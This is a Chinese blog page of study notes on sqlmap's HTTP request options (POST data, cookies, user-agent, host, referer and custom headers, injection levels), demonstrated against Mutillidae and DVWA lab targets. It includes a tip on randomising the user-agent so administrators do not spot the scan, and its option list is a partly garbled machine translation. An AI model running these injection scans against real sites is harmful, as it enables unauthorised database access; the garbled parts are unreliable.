<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>2  sqlmap工具详细使用 SQLMAP自动注入头部的修改 | Hexo</title><meta name="keywords" content="渗透工具使用"><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="学习笔记：任务094：SQLMAP自动注入-REQUEST 请求类型的参数：123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858">
<meta property="og:type" content="article">
<meta property="og:title" content="2  sqlmap工具详细使用 SQLMAP自动注入头部的修改">
<meta property="og:url" content="http://example.com/2019/11/08/2%20%20sqlmap%E5%B7%A5%E5%85%B7%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%20SQLMAP%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5%E5%A4%B4%E9%83%A8%E7%9A%84%E4%BF%AE%E6%94%B9/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="学习笔记：任务094：SQLMAP自动注入-REQUEST 请求类型的参数：123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png">
<meta property="article:published_time" content="2019-11-08T10:44:25.000Z">
<meta property="article:modified_time" content="2021-11-04T07:13:00.246Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透工具使用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/wZass/zp/raw/master/img/20200913080330.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2019/11/08/2%20%20sqlmap%E5%B7%A5%E5%85%B7%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%20SQLMAP%E8%87%AA%E5%8A%A8%E6%B3%A8%E5%85%A5%E5%A4%B4%E9%83%A8%E7%9A%84%E4%BF%AE%E6%94%B9/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '2  sqlmap工具详细使用 SQLMAP自动注入头部的修改',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2021-11-04 15:13:00'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const fontSizeVal = saveToLocal.get('global-font-size')
    if (fontSizeVal !== undefined) {
      document.documentElement.style.setProperty('--global-font-size', fontSizeVal + 'px')
    }
    
    const detectApple = () => {
      if (GLOBAL_CONFIG_SITE.isHome && /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">174</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">47</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">68</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="not-top-img" id="page-header"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Hexo</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav></header><main class="layout" id="content-inner"><div id="post"><div id="post-info"><h1 class="post-title">2  sqlmap工具详细使用 SQLMAP自动注入头部的修改</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2019-11-08T10:44:25.000Z" title="发表于 2019-11-08 18:44:25">2019-11-08</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-04T07:13:00.246Z" title="更新于 2021-11-04 15:13:00">2021-11-04</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E9%BB%91%E5%AE%A2%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">黑客工具使用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E9%BB%91%E5%AE%A2%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/sqlmap/">sqlmap</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="2  sqlmap工具详细使用 SQLMAP自动注入头部的修改"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div><article class="post-content" id="article-container"><p>学习笔记：任务094：SQLMAP自动注入-REQUEST</p>
<h2 id="请求类型的参数："><a href="#请求类型的参数：" class="headerlink" title="请求类型的参数："></a>请求类型的参数：</h2><pre><code><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">这些选项可用于指定如何连接到目标URL</span><br><span class="line"></span><br><span class="line">--method=method强制使用给定的HTTP方法（例如PUT）</span><br><span class="line"></span><br><span class="line">--data=要通过POST发送的数据数据字符串（例如“id=1”）</span><br><span class="line"></span><br><span class="line">PARAM-DEL = PARA。用于分割参数值的字符（例如&amp;）</span><br><span class="line"></span><br><span class="line">--cookie=cookie HTTP cookie头值（例如“PHPSESSID=a8d127e…”）</span><br><span class="line"></span><br><span class="line">--cookie del=首席运营官。。用于分割cookie值的字符（例如；）</span><br><span class="line"></span><br><span class="line">--加载cookies=L包含Netscape/wget格式cookies的文件</span><br><span class="line"></span><br><span class="line">--从响应中删除set cookie Ignore set cookie头</span><br><span class="line"></span><br><span class="line">--用户代理=代理HTTP用户代理头值</span><br><span class="line"></span><br><span class="line">--基于HTTP用户代理头的移动模拟智能手机</span><br><span class="line"></span><br><span class="line">--随机代理使用随机选择的HTTP用户代理头值</span><br><span class="line"></span><br><span class="line">--host=host HTTP主机头值</span><br><span class="line"></span><br><span class="line">--referer=referer HTTP referer头值</span><br><span class="line"></span><br><span class="line">-H割台，--hea额外标题（例如“X-Forwarded-For:127.0.0.1”）</span><br><span class="line"></span><br><span class="line">--headers=headers额外的headers（例如，“Accept Language:fr\nETag:123”）</span><br><span class="line"></span><br><span class="line">--auth type=auth。。HTTP身份验证类型（基本、摘要、NTLM或PKI）</span><br><span class="line"></span><br><span class="line">--auth cred=验证。。HTTP身份验证凭据（名称：密码）</span><br><span class="line"></span><br><span class="line">--auth file=验证。。HTTP认证PEM证书/私钥文件</span><br><span class="line"></span><br><span class="line">--忽略代码=IG。。忽略（有问题的）HTTP错误代码（例如401）</span><br><span class="line"></span><br><span class="line">--忽略代理忽略系统默认代理设置</span><br><span class="line"></span><br><span class="line">--忽略重定向忽略重定向尝试</span><br><span class="line"></span><br><span class="line">--忽略超时忽略连接超时</span><br><span class="line"></span><br><span class="line">--proxy=proxy使用代理连接到目标URL</span><br><span class="line"></span><br><span class="line">--代理cred=PRO代理身份验证凭据（名称：密码）</span><br><span class="line"></span><br><span class="line">--代理文件=PRO从文件加载代理列表</span><br><span class="line"></span><br><span class="line">--使用匿名网络</span><br><span class="line"></span><br><span class="line">--tor端口=TORPORT设置为非默认代理端口</span><br><span class="line"></span><br><span class="line">--tor type=TORTYPE设置为代理类型（HTTP、SOCKS4或SOCKS5（默认值））</span><br><span class="line"></span><br><span class="line">--检查tor检查tor是否正确使用</span><br><span class="line"></span><br><span class="line">--delay=每个HTTP请求之间的延迟延迟（秒）</span><br><span class="line"></span><br><span class="line">--timeout=超时连接前等待的超时秒数（默认值30）</span><br><span class="line"></span><br><span class="line">--retries=连接超时时重试（默认3）</span><br><span class="line"></span><br><span class="line">——给定参数的随机化＝rPARAM随机变化值</span><br><span class="line"></span><br><span class="line">--safe url=测试期间要经常访问的SAFEURL url地址</span><br><span class="line"></span><br><span class="line">--安全柱=安全将数据发送到安全的URL</span><br><span class="line"></span><br><span class="line">--安全要求=安全。。从文件加载安全的HTTP请求</span><br><span class="line"></span><br><span class="line">--安全频率=安全两次访问给定安全URL之间的测试请求</span><br><span class="line"></span><br><span class="line">--跳过URL编码跳过有效负载数据的URL编码</span><br><span class="line"></span><br><span class="line">--csrf令牌=CSR。。用于保存反CSRF令牌的参数</span><br><span class="line"></span><br><span class="line">--csrf url=CSRFURL提取反csrf令牌要访问的url地址</span><br><span class="line"></span><br><span class="line">--csrf方法=CS。。访问反CSRF令牌页时使用的HTTP方法</span><br><span class="line"></span><br><span class="line">--强制ssl强制使用ssl/HTTPS</span><br><span class="line"></span><br><span class="line">--分块使用HTTP分块传输编码（POST）请求</span><br><span class="line"></span><br><span class="line">--hpp使用HTTP参数污染方法</span><br><span class="line"></span><br><span class="line">--eval=eval code在请求之前评估提供的Python代码（例如。</span><br><span class="line"></span><br><span class="line">“导入hashlib；id2=hashlib.md5（id.hexdigest（）”）</span><br></pre></td></tr></table></figure>
</code></pre>
<p>SQLMAP是来进行sql注入的是给予http协议的</p>
<h2 id="下面是参数的演示修改头"><a href="#下面是参数的演示修改头" class="headerlink" title="下面是参数的演示修改头"></a>下面是参数的演示修改头</h2><h2 id="参数-–data"><a href="#参数-–data" class="headerlink" title="参数  –data"></a>参数  –data</h2><p>get或post都适用<br>–data里面放变量的<br>数据段:–data</p>
<h2 id="get演示"><a href="#get演示" class="headerlink" title="get演示"></a>get演示</h2><p>URL地址<code>http://172.16.103.128/mutillidae/index.php?page=login.php</code>怎么参数撒不包含sql注入的<br><img src="https://img-blog.csdnimg.cn/20191108183521789.png" alt="在这里插入图片描述"><br>要检测有sql注入漏洞参数名称是通过post数据部分进行传输的<br>在这个地方<br><img src="https://img-blog.csdnimg.cn/20191108185811815.png" alt="在这里插入图片描述"><br>叫上面的参数放到–data里<br>然后进行–dbs扫描<br>–dbs查看你数据管理系统有多少库显示库名<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://172.16.103.128/mutillidae/index.php?page=login.php&quot; --data=&quot;username=1&amp;password=1&amp;login-php-submit-button=Login&quot; --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191108190359852.png" alt="在这里插入图片描述"></p>
<h2 id="POST演示"><a href="#POST演示" class="headerlink" title="POST演示"></a>POST演示</h2><p>原先的URL地址<code>http://172.16.103.128/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details</code><br>用–data参数<br>命令<br>里面存放post变量<br>里面不放”？”了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://172.16.103.128/mutillidae/index.php&quot; --data=&quot;page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot; --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191108192415408.png" alt="在这里插入图片描述"></p>
<h2 id="变量分隔符-–param-del"><a href="#变量分隔符-–param-del" class="headerlink" title="变量分隔符 –param-del"></a>变量分隔符 –param-del</h2><p>通常URL地址里都是用<br><code>http://172.16.103.128/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details</code>是用的&amp;进行分割的<br>还有的是用;进行分割的<br><code>http://1.1.1.1/a.php?q=foo;id=1</code><br>我们可以用–param-del进行修改分割符<br>列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://1.1.1.1/a.php&quot; --data=&quot;q=foo;id=1&quot; --param-del=&quot;;&quot; -f</span><br></pre></td></tr></table></figure>
<h2 id="cookie-头"><a href="#cookie-头" class="headerlink" title="cookie 头"></a>cookie 头</h2><p>web应用需要基于cookie的身份认证，</p>
<h3 id="cookie-头-–cookie"><a href="#cookie-头-–cookie" class="headerlink" title="cookie 头 –cookie"></a>cookie 头 –cookie</h3><p>可以用–cookie进行添加cookie<br>在浏览器里也可以找到cookie的<br><img src="https://img-blog.csdnimg.cn/20191110153611683.png" alt="在这里插入图片描述"><br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://192.168.43.245/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=6c9388ff1b30ee4c444e21b5a2aff95e&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191110153916852.png" alt="在这里插入图片描述"></p>
<h3 id="然后扫描到其他网页更换了cookie工具sqlmap会自动进行更换cookie的"><a href="#然后扫描到其他网页更换了cookie工具sqlmap会自动进行更换cookie的" class="headerlink" title="然后扫描到其他网页更换了cookie工具sqlmap会自动进行更换cookie的"></a>然后扫描到其他网页更换了cookie工具sqlmap会自动进行更换cookie的</h3><p>我们可以添加一个<code>--drop-set-cookie</code>不叫他更换cookie</p>
<h3 id="sqlmap-会自动检查cookie中的注入点-level-gt-至少是2"><a href="#sqlmap-会自动检查cookie中的注入点-level-gt-至少是2" class="headerlink" title="sqlmap 会自动检查cookie中的注入点(level&gt;=至少是2)"></a>sqlmap 会自动检查cookie中的注入点(level&gt;=至少是2)</h3><p>加上–level 1-5<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://192.168.43.245/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=6c9388ff1b30ee4c444e21b5a2aff95e&quot; --level 2 --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191110164244790.png" alt="在这里插入图片描述"></p>
<h2 id="参数–user-agent可以修改-user-agent"><a href="#参数–user-agent可以修改-user-agent" class="headerlink" title="参数–user-agent可以修改 user-agent"></a>参数–user-agent可以修改 user-agent</h2><p>默认发的探测包不是其他想IE浏览器或者是其他浏览器发的包默认撒sqlmap发的<br>这样的话网站管理员就会发现有人用sqlmap在扫那<br><img src="https://img-blog.csdnimg.cn/20191111183440840.png" alt="在这里插入图片描述"></p>
<h3 id="用–random-agent随机user-agent"><a href="#用–random-agent随机user-agent" class="headerlink" title="用–random-agent随机user-agent"></a>用–random-agent随机user-agent</h3><p>配置的user-agent在这个文件里<code>/usr/share/sqlmap/data/txt/user-agents.txt</code><br>–random-agent会随机用上面这个文件里的user-agent<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.54.56/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --random-agent</span><br></pre></td></tr></table></figure>
<p>看一下就不是sqlmap了<br><img src="https://img-blog.csdnimg.cn/20191111185640486.png" alt="在这里插入图片描述"></p>
<h3 id="自己指定user-agent"><a href="#自己指定user-agent" class="headerlink" title="自己指定user-agent"></a>自己指定user-agent</h3><p>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.54.56/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-	button=View+Account+Details&quot;  --user-agent aaaaa</span><br></pre></td></tr></table></figure>
<p>可以看见是aaa<br><img src="https://img-blog.csdnimg.cn/20191111190002178.png" alt="在这里插入图片描述">4.3使 sqlmap 检查 user-agent 中的注入点：level &gt;= 3<br>user-agent也是存在sql注入的<br>sqlmap扫描 user-agent 是否存在sql注入不须level&gt;= 3 才会看看user-agent 是否存在漏洞<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --random-agent  --level 3</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191112182750938.png" alt="在这里插入图片描述">4.3如果出现了报错服务器你的扫描就会包下面的错误</p>
<p><code>[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP  status code, try to force the HTTP User-Agent header with option --useragent or --random-agent</code></p>
<h2 id="host头"><a href="#host头" class="headerlink" title="host头"></a>host头</h2><p>修改host头需要加上<code>--host=&quot;xxxx&quot;</code><br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  –-host=&quot;aaaaaaaa&quot;  --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/2019111218422979.png" alt="在这里插入图片描述">扫描host头是否存在sql漏洞level &gt;= 5 才可以<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  –-host=&quot;aaaaaaaa&quot;  --level 5  --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191112184516175.png" alt="在这里插入图片描述"></p>
<h2 id="Referer头"><a href="#Referer头" class="headerlink" title="Referer头"></a>Referer头</h2><p>referer头是比如我们访问一个网页要跳转到另外一个网页原来的URL会在referer里</p>
<h3 id="修改referer后面加上参数-referer-quot-要指定的referer-quot"><a href="#修改referer后面加上参数-referer-quot-要指定的referer-quot" class="headerlink" title="修改referer后面加上参数--referer=&quot;要指定的referer&quot;"></a>修改referer后面加上参数<code>--referer=&quot;要指定的referer&quot;</code></h3><p>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --referer==&quot;aaaaaaaa&quot;    --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/2019111218565553.png" alt="在这里插入图片描述"></p>
<h3 id="要检referer是否存在sql注入漏洞–level-gt-3才可以"><a href="#要检referer是否存在sql注入漏洞–level-gt-3才可以" class="headerlink" title="要检referer是否存在sql注入漏洞–level&gt;=3才可以"></a>要检referer是否存在sql注入漏洞–level&gt;=3才可以</h3><p>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --referer==&quot;aaaaaaaa&quot;  --level 3  --dbs</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20191112185823396.png" alt="在这里插入图片描述"></p>
<h2 id="另外如果没有这这个修改参数的头可以用-–headers参数下面是他的使用"><a href="#另外如果没有这这个修改参数的头可以用-–headers参数下面是他的使用" class="headerlink" title="另外如果没有这这个修改参数的头可以用 –headers参数下面是他的使用"></a>另外如果没有这这个修改参数的头可以用 –headers参数下面是他的使用</h2><p>提示《里面的头名要给包的头名一样列Host》<br><img src="https://img-blog.csdnimg.cn/20191112191454364.png" alt="在这里插入图片描述"></p>
<h3 id="单个要修改的头参数-headers-quot-头名-quot-要修改的东西-quot-quot-这个就不演示了"><a href="#单个要修改的头参数-headers-quot-头名-quot-要修改的东西-quot-quot-这个就不演示了" class="headerlink" title="单个要修改的头参数--headers=&quot;头名:&quot;要修改的东西&quot;&quot;这个就不演示了"></a>单个要修改的头参数<code>--headers=&quot;头名:&quot;要修改的东西&quot;&quot;</code>这个就不演示了</h3><h3 id="要是多个必须换行-n参数-headers-quot-头名-quot-要修改的东西-n-quot-头名-quot-要修改的东西-quot"><a href="#要是多个必须换行-n参数-headers-quot-头名-quot-要修改的东西-n-quot-头名-quot-要修改的东西-quot" class="headerlink" title="要是多个必须换行\n参数--headers=&quot;头名:&quot;要修改的东西\n&quot;头名:&quot;要修改的东西&quot;"></a>要是多个必须换行\n参数<code>--headers=&quot;头名:&quot;要修改的东西\n&quot;头名:&quot;要修改的东西&quot;</code></h3><p>命令<br>这个我就用Host头和User-Agent头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.36/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --headers=&quot;Host:www.aaa.com\nUser-Agent:AAAAAAAAAA&quot;   --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/2019111219175895.png" alt="在这里插入图片描述"><br>可以看见被修改了<br><img src="https://img-blog.csdnimg.cn/20191112192002748.png" alt="在这里插入图片描述"></p>
<h2 id="扫描指定发的包GET和POST"><a href="#扫描指定发的包GET和POST" class="headerlink" title="扫描指定发的包GET和POST"></a>扫描指定发的包GET和POST</h2><p>参数<code>--method=GET或POST</code><br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.51.26/mutillidae/index.php?page=user-info.php&amp;username=1&amp;password=1&amp;user-info-php-submit-button=View+Account+Details&quot;  --method=POST   --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191113095205153.png" alt="在这里插入图片描述"></p>
<h2 id="基于HTTP协议的身份验证"><a href="#基于HTTP协议的身份验证" class="headerlink" title="基于HTTP协议的身份验证"></a>基于HTTP协议的身份验证</h2><p>类型<br>Basic<br>Digest<br>NTLM<br>这个就不演示了<br>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://1.1.1.1/a.php?id=1&quot; --auth-type=身份认证类型 --auth-cred=&quot;帐号:密码&quot;--proxy=&quot;http://代理的ip:代理的端口&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="非常少见的居于客户端证书来进行身份认证的"><a href="#非常少见的居于客户端证书来进行身份认证的" class="headerlink" title="非常少见的居于客户端证书来进行身份认证的"></a>非常少见的居于客户端证书来进行身份认证的</h2><p>这个我也不太明白<br>参数<code>--auth-file=&quot;证书&quot;</code></p>
